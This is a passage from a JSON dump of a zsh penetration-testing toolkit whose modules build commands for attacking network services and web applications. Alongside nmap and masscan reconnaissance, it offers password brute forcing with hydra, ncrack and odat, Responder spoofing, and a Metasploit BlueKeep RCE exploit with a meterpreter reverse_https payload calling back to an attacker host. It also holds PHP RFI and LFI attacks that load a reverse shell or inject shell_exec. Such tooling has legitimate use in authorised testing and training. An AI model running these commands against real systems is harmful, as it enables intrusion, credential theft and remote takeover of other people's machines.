\"nmap -vvv -sn --open ${__NETWORK} -oA $(__netpath)/nmap-ping-sweep\"\n}\n\nqq-enum-network-nmap-syn-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -vvv -n -Pn -sS --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-syn-sweep\"\n}\n\nqq-enum-network-nmap-udp-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -vvv -n -Pn -sU --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-udp-sweep\"\n}\n\nqq-enum-network-nmap-all-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -vvv -n -Pn -T4 --open -sS -p- ${__NETWORK} -oA $(__netpath)/nmap-all-sweep\"\n}\n\nqq-enum-network-nmap-discovery() {\n    __check-project\n    qq-vars-set-network\n    print -z \"nmap -vvv -n -Pn -sV -sC --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-discovery\"\n}\n\nqq-enum-network-masscan-top() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo masscan ${__NETWORK} -p${__TCP_PORTS} -oL $(__netpath)/masscan-top.txt\"\n}\n\nqq-enum-network-masscan-windows() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo masscan ${__NETWORK} -p135-139,445,3389,389,636,88 -oL $(__netpath)/masscan-windows.txt\"\n}\n\nqq-enum-network-masscan-linux() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo masscan ${__NETWORK} -p22,111,2222 -oL $(__netpath)/masscan-linux.txt\"\n}\n\nqq-enum-network-masscan-web() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo masscan ${__NETWORK} -p80,800,8000,8080,8888,443,4433,4443 -oL $(__netpath)/masscan-web.txt\"\n}\n"
  },
  {
    "path": "modules/qq-enum-nfs.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-nfs\n#############################################################\n\nqq-enum-nfs-help() {\n    cat << \"DOC\"\n\nqq-enum-nfs\n-----------\nThe qq-enum-nfs namespace contains commands for scanning and \nenumerating NFS services.\n\nCommands\n--------\nqq-enum-nfs-install:        installs dependencies\nqq-enum-nfs-nmap-sweep:     scan a network for services\nqq-enum-nfs-tcpdump:        capture traffic to and from a host\nqq-enum-nfs-show:           show remote NFS shares\nqq-enum-nfs-mount:          mount a remote NFS share locally\n\nDOC\n}\n\nqq-enum-nfs-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap nfs-common\n}\n\nqq-enum-nfs-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -sU -p U:111,T:111,U:2049,T:2049 ${__NETWORK} -oA $(__netpath)/nfs-sweep\"\n}\n\nqq-enum-nfs-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} 'host ${__RHOST} and (tcp port 111 or port 2049)' -w $(__hostpath)/nfs.pcap\"\n}\n\nqq-enum-nfs-show() {\n    qq-vars-set-rhost\n    print -z \"showmount -e ${__RHOST}\"\n}\n\nqq-enum-nfs-mount() {\n    qq-vars-set-rhost\n    local share && __askvar share SHARE\n    mkdir -p /mnt/${share}\n    print -z \"mount -t nfs ${__RHOST}:/${share} /mnt/${share} -o nolock\"\n}\n"
  },
  {
    "path": "modules/qq-enum-oracle.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-oracle\n#############################################################\n\nqq-enum-oracle-help() {\n    cat << \"DOC\"\n\nqq-enum-oracle\n--------------\nThe qq-enum-oracle namespace contains commands for scanning and \nenumerating Oracle services and databases.\n\nCommands\n--------\nqq-enum-oracle-install:           installs dependencies\nqq-enum-oracle-nmap-sweep:        scan a network for services\nqq-enum-oracle-tcpdump:           capture traffic to and from a host\nqq-enum-oracle-sqlplus:           sqlplus client\nqq-enum-oracle-odat:              odat anonymous enumeration\nqq-enum-oracle-odat-creds:        odat authenticated enumeration\nqq-enum-oracle-odat-passwords:    odat password brute\nqq-enum-oracle-version:           tnscmd version query\nqq-enum-oracle-status:            tnscmd status query\nqq-enum-oracle-sidguess:          tnscmd password brute force\nqq-enum-oracle-oscanner:          oscanner enumeration\nqq-enum-oracle-hydra-listener:    brute force passwords \nqq-enum-oracle-hydra-sid:         brute force passwords\n\nDOC\n}\n\nqq-enum-oracle-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap odat tnscmd10g sidguess oscanner hydra\n    __pkgs oracle-instantclient-sqlplus \n    sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\"; sudo ldconfig\n}\n\nqq-enum-oracle-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -p 1521 ${__NETWORK} -oA $(__netpath)/oracle-sweep\"\n}\n\nqq-enum-oracle-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1521 -w $(__hostpath)/oracle.pcap\"\n}\n\nqq-enum-oracle-sqlplus() {\n    qq-vars-set-rhost\n    local sid && __askvar sid \"SID(DATABASE)\"\n    local u && __askvar u \"USER\"\n    local p && 
__askvar p \"PASSWORD\"\n    print -z \"sqlplus ${u}/${p}@${__RHOST}:1521/${sid} as sysdba\"\n}\n\nqq-enum-oracle-odat() {\n    qq-vars-set-rhost\n    print -z \"odat all -s ${__RHOST}\"\n}\n\nqq-enum-oracle-odat-creds() {\n    qq-vars-set-rhost\n    local sid && __askvar sid \"SID(DATABASE)\"\n    local u && __askvar u \"USER\"\n    local p && __askvar p \"PASSWORD\"\n    print -z \"odat all -s ${__RHOST} -p 1521 -d ${sid} -U ${u} -P ${p}\"\n}\n\nqq-enum-oracle-odat-passwords() {\n    qq-vars-set-rhost\n    local sid && __askvar sid \"SID(DATABASE)\"\n    __info 'cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | sed -e \"s/[[:space:]]/\\\\\\/g\"'\n    print -z \"odat passwordguesser -s ${__RHOST} -d ${sid} --accounts-file accounts.txt\"\n}\n\nqq-enum-oracle-version(){\n    qq-vars-set-rhost\n    print -z \"tnscmd10g version -h ${__RHOST}\"\n}\n\nqq-enum-oracle-status(){\n    qq-vars-set-rhost\n    print -z \"tnscmd10g status -h ${__RHOST}\"\n}\n\nqq-enum-oracle-sidguess(){\n    qq-vars-set-rhost\n    print -z \"sidguess host=${__RHOST} port=1521 sidfile=sid.txt\"\n}\n\nqq-enum-oracle-oscanner() {\n    qq-vars-set-rhost\n    print -z \"oscanner -s ${__RHOST}\"\n}\n\nqq-enum-oracle-hydra-listener() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-listener-hydra-brute.txt ${__RHOST} Oracle Listener\"\n}\n\nqq-enum-oracle-hydra-sid() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-sid-hydra-brute.txt ${__RHOST} Oracle Sid\"\n}\n"
  },
  {
    "path": "modules/qq-enum-pop3.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-pop3\n#############################################################\n\nqq-enum-pop3-help() {\n    cat << \"DOC\"\n\nqq-enum-pop3\n------------\nThe qq-enum-pop3 namespace contains commands for scanning \nand enumerating POP3 email services.\n\nCommands\n--------\nqq-enum-pop3-install:     installs dependencies\nqq-enum-pop3-nmap-sweep:  scan a network for services\nqq-enum-pop3-tcpdump:     capture traffic to and from a host\nqq-enum-pop3-hydra:       brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-pop3-install() {\n    __info \"Running $0...\"\n    __pkgs nmap tcpdump hydra\n}\n\nqq-enum-pop3-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -p 110,995 ${__NETWORK} -oA $(__netpath)/pop3-sweep\"\n}\n\nqq-enum-pop3-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} 'host ${__RHOST} and (tcp port 110 or port 995)' -w $(__hostpath)/pop3.pcap\"\n}\n\nqq-enum-pop3-hydra() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/pop3-hydra-brute.txt ${__RHOST} POP3\"\n}\n"
  },
  {
    "path": "modules/qq-enum-rdp.zsh",
    "content": "#!/usr/bin/env zsh\n\n#############################################################\n# qq-enum-rdp\n#############################################################\n\nqq-enum-rdp-help() {\n    cat << \"DOC\"\n\nqq-enum-rdp\n------------\nThe qq-enum-rdp namespace contains commands for scanning\nand enumerating RDP remote desktop services.\n\nCommands\n--------\nqq-enum-rdp-install:                  installs dependencies\nqq-enum-rdp-nmap-sweep:               scan a network for services\nqq-enum-rdp-tcpdump:                  capture traffic to and from a host\nqq-enum-rdp-ncrack:                   brute force passwords for a user account\nqq-enum-rdp-bluekeep:                 bluekeep exploit reference\nqq-enum-rdp-msf-bluekeep-scan:        bluekeep metasploit scanner\nqq-enum-rdp-msf-bluekeep-exploit:     bluekeep metasploit exploit\n\nDOC\n}\n\nqq-enum-rdp-install() {\n    __info \"Running $0...\"\n    __pkgs nmap tcpdump ncrack metasploit-framework\n}\n\nqq-enum-rdp-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"nmap -n -Pn -sS -p3389 ${__NETWORK} -oA $(__netpath)/rdp-sweep\"\n}\n\nqq-enum-rdp-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3389 -w $(__hostpath)/rdp.pcap\"\n}\n\nqq-enum-rdp-ncrack() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"ncrack -vv --user ${__USER} -P ${__PASSLIST} rdp://${__RHOST} -oN $(__hostpath)/ncrack-rdp.txt \"\n}\n\nqq-enum-rdp-bluekeep() {\n    __info \"https://sploitus.com/exploit?id=EDB-ID:47683\"\n    print -z \"searchsploit bluekeep\"\n}\n\nqq-enum-rdp-msf-bluekeep-scan() {\n    __check-project\n    qq-vars-set-rhost\n    local cmd=\"use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS ${__RHOST}; run; exit\"\n    print -z \"msfconsole -n -q -x \\\" ${cmd} \\\" | tee $(__hostpath)/bluekeep-scan.txt\"\n}\n\nqq-enum-rdp-msf-bluekeep-exploit() {\n    
qq-vars-set-rhost\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    #__warn \"Start a handler using on ${__LHOST}:${__LPORT} before proceeding\"\n    __msf << VAR\nuse windows/rdp/cve_2019_0708_bluekeep_rce;\nset RHOSTS ${__RHOST};\nset PAYLOAD windows/x64/meterpreter/reverse_https;\nset stagerverifysslcert true;\nset HANDLERSSLCERT ${__SHELL_SSL_CERT};\nset LHOST ${__LHOST};\nset LPORT ${__LPORT};\nrun;\nexit\nVAR\n\n}\n"
  },
  {
    "path": "modules/qq-enum-smb.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-smb\n#############################################################\n\nqq-enum-smb-help() {\n    cat << \"DOC\"\n\nqq-enum-smb\n------------\nThe qq-enum-smb namespace contains commands for scanning\nand enumerating smb services.\n\nCommands\n--------\nqq-enum-smb-install:                  installs dependencies\nqq-enum-smb-nmap-sweep:               scan a network for services\nqq-enum-smb-tcpdump:                  capture traffic to and from a host\nqq-enum-smb-null-smbmap:              query with smbmap null session\nqq-enum-smb-user-smbmap:              query with smbmap authenticated session\nqq-enum-smb-null-enum4:               enumerate with enum4linux\nqq-enum-smb-null-smbclient-list:      list shares with a null session\nqq-enum-smb-null-smbclient-connect:   connect with a null session\nqq-enum-smb-user-smbclient-connect:   connect with an authenticated session\nqq-enum-user-smb-mount:               mount an SMB share\nqq-enum-smb-samrdump:                 dump info using impacket\nqq-enum-smb-responder:                spoof and get responses using responder\nqq-enum-smb-net-use-null:             print a net use statement for windows\nqq-enum-smb-nbtscan:                  scan a local network \nqq-enum-smb-rpcclient:                use rpcclient for queries\n\nDOC\n}\n\nqq-enum-smb-install() {\n  __info \"Running $0...\"\n  __pkgs nmap tcpdump smbmap enum4linux smbclient impacket-scripts responder nbtscan rpcclient\n}\n\nqq-enum-smb-nmap-sweep() {\n  __check-project\n  qq-vars-set-network\n  print -z \"nmap -n -Pn -sS -sU -p445,137-139 ${__NETWORK} -oA $(__netpath)/smb-sweep\"\n}\n\nqq-enum-smb-tcpdump() {\n  __check-project\n  qq-vars-set-iface\n  qq-vars-set-rhost\n  print -z \"tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 445 -w $(__hostpath)/smb.pcap\"\n}\n\nqq-enum-smb-null-smbmap() {\n  qq-vars-set-rhost\n  print -z \"smbmap -H 
${__RHOST}\"\n}\n\nqq-enum-smb-user-smbmap() {\n  qq-vars-set-rhost\n  __check-user\n  __info \"Usage with creds: -u <user> -p <pass> -d <domain>\"\n  print -z \"smbmap -u ${__USER} -H ${__RHOST}\"\n}\n\nqq-enum-smb-null-enum4() {\n  qq-vars-set-rhost\n  print -z \"enum4linux -a ${__RHOST} | tee $(__hostpath)/enum4linux.txt \"\n}\n\nqq-enum-smb-null-smbclient-list() {\n  qq-vars-set-rhost\n  print -r -z \"smbclient -L \\\\\\\\\\\\\\\\${__RHOST} -N \"\n}\n\nqq-enum-smb-null-smbclient-connect() {\n  qq-vars-set-rhost\n  __check-share\n  print -r -z \"smbclient \\\\\\\\\\\\\\\\${__RHOST}\\\\\\\\${__SHARE} -N \"\n}\n\nqq-enum-smb-user-smbclient-connect() {\n  qq-vars-set-rhost\n  __check-user\n  __check-share\n  print -r -z \"smbclient \\\\\\\\\\\\\\\\${__RHOST}\\\\\\\\${__SHARE} -U ${__USER} \"\n}\n\nqq-enum-user-smb-mount() {\n  qq-vars-set-rhost\n  __check-user\n  local p && __askvar p PASSWORD\n  __check-share\n  print -z \"mount //${__RHOST}/${__SHARE} /mnt/${__SHARE} -o username=${__USER},password=${p}\"\n}\n\nqq-enum-smb-samrdump() {\n  qq-vars-set-rhost\n  print -z \"python3 ${__IMPACKET}/samrdump.py ${__RHOST}\"\n}\n\nqq-enum-smb-responder() {\n  qq-vars-set-iface\n  print -z \"responder -I ${__IFACE} -A\"\n}\n\nqq-enum-smb-net-use-null() {\n    qq-vars-set-rhost\n  __info \"net use \\\\\\\\\\\\\\\\${__RHOST}\\\\IPC$ \\\"\\\" /u:\\\"\\\" \"\n}\n\nqq-enum-smb-nbtscan() {\n  qq-vars-set-network\n  print -z \"nbtscan ${__NETWORK}\"\n}\n\nqq-enum-smb-rpcclient() {\n  qq-vars-set-rhost\n  print -z \"rpcclient -U \\\" \\\" ${__RHOST}\"\n}"
  },
  {
    "path": "modules/qq-enum-web-aws.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-aws\n#############################################################\n\nqq-enum-web-aws-help() {\n    cat << \"DOC\"\n\nqq-enum-web-aws\n---------------\nThe qq-enum-web-aws namespace contains commands for scanning \nand enumerating AWS hosted services.\n\nCommands\n--------\nqq-enum-web-aws-install:     installs dependencies\nqq-enum-web-aws-s3-ls:       use the awscli to list files in an S3 bucket\nqq-enum-web-aws-s3-write:    use the awscli to copy a local file to an S3 bucket\nqq-enum-web-aws-s3-scanner:  scan a list of buckets\n\nDOC\n}\n\nqq-enum-web-aws-install() {\n    __info \"Running $0...\"\n    __pkgs awscli\n    qq-install-s3scanner\n}\n\nqq-enum-web-aws-s3-ls() {\n    qq-vars-set-rhost\n    print -z \"aws s3 ls s3://${__RHOST} --recursive\"\n}\n\nqq-enum-web-aws-s3-write() {\n    qq-vars-set-rhost\n    __ask \"Select a file to copy to the S3 bucket\"\n    local f && __askpath f FILE $(pwd)\n    print -z \"aws s3 cp \\\"${f}\\\" s3://${__RHOST}\"\n}\n\nqq-enum-web-aws-s3-scanner() {\n    __ask \"Select a file that contains a list of S3 buckets\"\n    local f && __askpath f FILE $(pwd)\n    __info \"Use -d to dump buckets to local path\"\n    print -z \"python3 ${__TOOLS}/S3Scanner/s3scanner.py ${f}\"\n} \n"
  },
  {
    "path": "modules/qq-enum-web-dirs.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-dirs\n#############################################################\n\nqq-enum-web-dirs-help() {\n    cat << \"DOC\"\n\nqq-enum-web-dirs\n----------------\nThe qq-enum-web-dirs namespace contains commands for discovering web content, directories and files.\n\nCommands\n--------\nqq-enum-web-dirs-install:      installs dependencies\nqq-enum-web-dirs-robots:       get robots.txt using curl\nqq-enum-web-dirs-parsero:      parse complex robots.txt with parsero\nqq-enum-web-dirs-wfuzz:        brute force dirs and files with wfuzz\nqq-enum-web-dirs-ffuf:         brute force dirs and files with ffuf\nqq-enum-web-dirs-gobuster:     brute force dirs and files with gobuster\n\nDOC\n}\n\nqq-enum-web-dirs-install() {\n    __info \"Running $0...\"\n    __pkgs parsero gobuster wfuzz curl seclists wordlists \n    qq-install-golang\n    go get -u github.com/ffuf/ffuf\n    go get -v -u github.com/tomnomnom/httprobe\n}\n\nqq-enum-web-dirs-robots() {\n    __check-project\n    qq-vars-set-url\n    print -z \"curl -s -L --user-agent \\\"${__UA}\\\" \\\"${__URL}/robots.txt\\\" | tee $(__urlpath)/robots.txt\"\n}\n\nqq-enum-web-dirs-parsero() {\n    __check-project\n    qq-vars-set-url\n    print -z \"parsero -u \\\"${__URL}\\\" -o -sb | tee $(__urlpath)/robots.txt\"\n}\n\nqq-enum-web-dirs-wfuzz() {\n    __check-project\n    qq-vars-set-url\n    qq-vars-set-wordlist\n    local d && __askvar d \"RECURSION DEPTH\"\n    print -z \"wfuzz -s 0.1 -R${d} --hc=404 -w ${__WORDLIST} ${__URL}/FUZZ --oF $(__urlpath)/wfuzz-dirs.txt\"\n}\n\nqq-enum-web-dirs-ffuf() {\n    __check-project\n    qq-vars-set-url\n    qq-vars-set-wordlist\n    __check-threads\n    local d && __askvar d \"RECURSION DEPTH\"\n    print -z \"ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \\\"User-Agent: Mozilla\\\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -o $(__urlpath)/ffuf-dirs.csv -of 
csv\"\n}\n\nqq-enum-web-dirs-gobuster() {\n    __check-project\n    qq-vars-set-url\n    qq-vars-set-wordlist\n    __check-threads\n    print -z \"gobuster dir -u ${__URL} -a \\\"${__UA}\\\" -t1 -k -w ${__WORDLIST} | tee $(__urlpath)/gobuster-dirs.txt \"\n}\n"
  },
  {
    "path": "modules/qq-enum-web-eslastic.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-elastic\n#############################################################\n\nqq-enum-web-elastic-help() {\n    cat << \"DOC\"\n\nqq-enum-web-elastic\n-------------------\nThe qq-enum-web-elastic namespace contains commands for scanning and enumerating\nelastic search services.\n\nCommands\n--------\nqq-enum-web-elastic-install:     installs dependencies\nqq-enum-web-elastic-nmap:        scan the target using the elasticsearch nmap nse script\nqq-enum-web-elastic-health:      query the target using curl for cluster health\nqq-enum-web-elastic-indices:     query the target using curl for indices\nqq-enum-web-elastic-search:      query an index using curl\nqq-enum-web-elastic-all:         query for 1000 records in an index using curl\n\nDOC\n}\n\nqq-enum-web-elastic-install() {\n    __info \"Running $0...\"\n    __pkgs nmap curl\n    qq-install-nmap-elasticsearch-nse\n}\n\nqq-enum-web-elastic-nmap() {\n    __check-project\n    qq-vars-set-rhost\n    print -z \"sudo nmap -n -Pn -p9200 --script=elasticsearch ${__RHOST} -oN $(__hostpath)/nmap-elastic.txt\"\n}\n\nqq-enum-web-elastic-health() {\n    qq-vars-set-url\n    print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/_cluster/health?pretty\\\"\"\n}\n\nqq-enum-web-elastic-indices() {\n    qq-vars-set-url\n    print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/_cat/indices?v\\\"\"\n}\n\nqq-enum-web-elastic-search() {\n  qq-vars-set-url\n  local i && __askvar i \"INDEX\" \n   __ask \"Enter a query, such as *:password\"\n  local q && __askvar q \"QUERY\"\n  print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/${i}/_search?q=${q}&size=10&pretty\\\"\"\n}\n\nqq-enum-web-elastic-all() {\n  __check-project\n  qq-vars-set-url\n  local i && __askvar i \"INDEX\"\n  print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/${i}/_search?size=1000\\\" | tee $(__urlpath)/elastic-docs.json\"\n}\n"
  },
  {
    "path": "modules/qq-enum-web-fuzz.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-fuzz\n#############################################################\n\nqq-enum-web-fuzz-help() {\n    cat << \"DOC\"\n\nqq-enum-web-fuzz\n--------------\nThe qq-enum-web-fuzz namespace contains commands for fuzzing\ninputs of web applications\n\nCommands\n--------\nqq-enum-web-fuzz-install:                  installs dependencies\nqq-enum-web-fuzz-auth-basic-payloads:      generate base64 encoded credentials\nqq-enum-web-fuzz-auth-basic-ffuf:          brute force basic auth\nqq-enum-web-fuzz-auth-json-ffuf:           brute force basic auth with json post\nqq-enum-web-fuzz-auth-post-ffuf:           brute force auth with post\nqq-enum-web-fuzz-auth-post-wfuzz:          brute force auth with post\nqq-enum-web-brute-hydra-get:               brute force auth with get\nqq-enum-web-brute-hydra-form-post:         brute force auth with post\n\nDOC\n}\n\nqq-enum-web-fuzz-install() {\n    __info \"Running $0...\"\n    __pkgs seclists wordlists wfuzz hydra\n    qq-install-golang\n    go get -u github.com/ffuf/ffuf\n}\n\n\nqq-enum-web-fuzz-auth-basic-payloads() {\n    qq-vars-set-wordlist\n    __check-user\n    print -z \"file=\\\"${__WORDLIST}\\\"; while IFS= read line; do; echo -n \\\"${__USER}:\\$line\\\" | base64 ; done <\\\"\\$file\\\" > payloads.b64\"\n}\n\n# ffuf\n\nqq-enum-web-fuzz-auth-basic-ffuf() {\n    qq-vars-set-url\n    __ask \"Select file containing authorization header payloads\"\n    local f && __askpath f FILE $(pwd)\n    __check-threads\n    print -z \"ffuf -t ${__THREADS} -p \\\"0.1\\\" -w ${f} -H \\\"Authorization: Basic FUZZ\\\" -fc 401 -u ${__URL}  \"\n}\n\nqq-enum-web-fuzz-auth-json-ffuf() {\n    qq-vars-set-url\n    __check-threads\n    print -z \"ffuf -t ${__THREADS} -p \\\"0.1\\\" -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -u ${__URL} -X POST -H \\\"Content-Type: application/json\\\" -d '{\\\"username\\\": \\\"FUZZ\\\", \\\"password\\\": 
\\\"FUZZ\\\"}' -fr \\\"error\\\" \"\n}\n\nqq-enum-web-fuzz-auth-post-ffuf() {\n    qq-vars-set-url\n    local uf && __askvar uf USER_FIELD\n    local uv && __askvar uv USER_VALUE\n    local pf && __askvar pf PASSWORD_FIELD\n    __check-threads\n    print -z \"ffuf -t ${__THREADS}  -p \\\"0.1\\\" -w ${__PASSLIST}  -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -X POST -d \\\"${uf}=${uv}&${pf}=FUZZ\\\" -u ${__URL} -fs 75 \"\n}\n\n# wfuzz\n\nqq-enum-web-fuzz-auth-post-wfuzz() {\n    qq-vars-set-url\n    local uf && __askvar uf USER_FIELD\n    local uv && __askvar uv USER_VALUE\n    local pf && __askvar pf PASSWORD_FIELD\n    print -z \"wfuzz -c -w ${__PASSLIST} -d \\\"${uf}=${uv}&${pf}=FUZZ\\\" --sc 302 ${__URL}\"\n}\n\nqq-enum-web-brute-hydra-get() {\n    qq-vars-set-rhost\n    __check-user\n    __ask \"Enter the URI for the get request, ex: /path\"\n    local uri && __askvar uri URI\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} ${__RHOST} http-get ${uri}\"\n}\n\nqq-enum-web-brute-hydra-form-post() {\n    qq-vars-set-rhost\n    __ask \"Enter the URI for the post request, ex: /path\"\n    local uri && __askvar uri URI\n    local uf && __askvar uf USER_FIELD\n    local uv && __askvar uv USER_VALUE\n    local pf && __askvar pf PASSWORD_FIELD\n    __ask \"Enter the response value to check for failure\"\n    local fm && __askvar fm FAILURE\n    print -z \"hydra ${__RHOST} http-form-post \\\"${uri}:${uf}=^USER^&${pf}=^PASS^:${fm}\\\" -l ${uv} -P ${__PASSLIST} -t 10 -w 30 \"\n}"
  },
  {
    "path": "modules/qq-enum-web-js.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-js\n#############################################################\n\nqq-enum-web-js-help() {\n    cat << \"DOC\"\n\nqq-enum-web-js\n--------------\nThe qq-enum-web-js namespace contains commands for enumerating\njavascript files and mining for urls and secrets.\n\nCommands\n--------\nqq-enum-web-js-install:             installs dependencies\nqq-enum-web-js-beautify:            beautify JS file\nqq-enum-web-js-link-finder-url:     run linkfinder on a file\nqq-enum-web-js-link-finder-domain:  run linkfinder on all files of a site\nqq-enum-web-js-curl:                enumerate links using curl\n\nDOC\n}\n\nqq-enum-web-js-install() {\n    __info \"Running $0...\"\n    __pkgs jsbeautifier qq-install-link-finder\n    qq-install-node\n    npm i -g eslint\n}\n\nqq-enum-web-js-beautify() {\n    local f && __askpath f FILE $(pwd)\n    print -z \"js-beautify ${f} > source-$(basename ${f})\"\n}\n\nqq-enum-web-js-link-finder-url() {\n    __check-project\n    __ask \"Set the URL of a javascript file\"\n    qq-vars-set-url\n    print -z \"python3 linkfinder.py -i ${__URL} -o $(__urlpath)/js-links.html\"\n}\n\nqq-enum-web-js-link-finder-domain() {\n    __check-project\n    qq-vars-set-url\n    print -z \"python3 linkfinder.py -i ${__URL} -d -o $(__urlpath)/js-links-all.html\"\n}\n\nqq-enum-web-js-curl() {\n    qq-vars-set-url\n    curl -Lks ${__URL} | tac | sed \"s#\\\\\\/#\\/#g\" | egrep -o \"src['\\\"]?\\s*[=:]\\s*['\\\"]?[^'\\\"]+.js[^'\\\"> ]*\" | sed -r \"s/^src['\\\"]?[=:]['\\\"]//g\" | awk -v url=${__URL} '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\\/\\//) print \"https:\"$1; else print url\"/\"$1}' | sort -fu | xargs -I '%' sh -c \"echo \\\"'##### %\\\";curl -k -s \\\"%\\\" | sed \\\"s/[;}\\)>]/\\n/g\\\" | grep -Po \\\"('#####.*)|(['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"> 
]{5,})|(\\.(get|post|ajax|load)\\s*\\(\\s*['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"> ]{5,})\\\" | sort -fu\" | tr -d \"'\\\"\"\n}\n\n\n"
  },
  {
    "path": "modules/qq-enum-web-php.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-php\n#############################################################\n\nqq-enum-web-php-help() {\n    cat << \"DOC\"\n\nqq-enum-web-php\n----------------\nThe qq-enum-web-php namespace contains commands for discovering web content, directories and files\non PHP web servers\n\nCommands\n--------\nqq-enum-web-php-install:                 installs dependencies\nqq-enum-web-php-ffuf:                    scan for PHP files\nqq-enum-web-php-rfi:                     exploit typical RFI params\nqq-enum-web-php-rfi-input \nqq-enum-web-php-lfi-proc-self-environ\nqq-enum-web-php-lfi-filter-resource\nqq-enum-web-php-lfi-zip-jpg-shell\nqq-enum-web-php-lfi-logfile\nqq-enum-web-php-gen-htaccess:            generate an htaccess file\nqq-enum-web-php-phpinfo:                 generate phpinfo payload\n\nDOC\n}\n\nqq-enum-web-php-install() {\n    __info \"Running $0...\"\n    __pkgs curl seclists wordlists\n    qq-install-golang\n    go get -u github.com/ffuf/ffuf\n    go get -v -u github.com/tomnomnom/httprobe\n}\n\nqq-enum-web-php-ffuf() {\n    __check-project\n    qq-vars-set-url\n    qq-vars-set-wordlist\n    __check-threads\n    local d && __askvar d \"RECURSION DEPTH\"\n    print -z \"ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \\\"User-Agent: Mozilla\\\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -e ${__EXT_PHP} -o $(__urlpath)/ffuf-dirs-php.csv -of csv\"\n}\n\nqq-enum-web-php-rfi() {\n    __ask \"URL should contain a URI like /page.php?rfi=\"\n    qq-vars-set-url\n    __ask \"PAYLOAD URL should contain reverse php shell\"\n    local p && __askvar p PAYLOAD_URL\n    print -z \"curl -k -v -XGET \\\"${__URL}${p}%00\\\" \"\n}\n\nqq-enum-web-php-rfi-input() {\n    __ask \"URL should contain a URI like /page.php?rfi=\"\n    qq-vars-set-url\n    print -z \"curl -k -v -XPOST --data \\\"<?php echo shell_exec('whoami'); ?>\\\"  
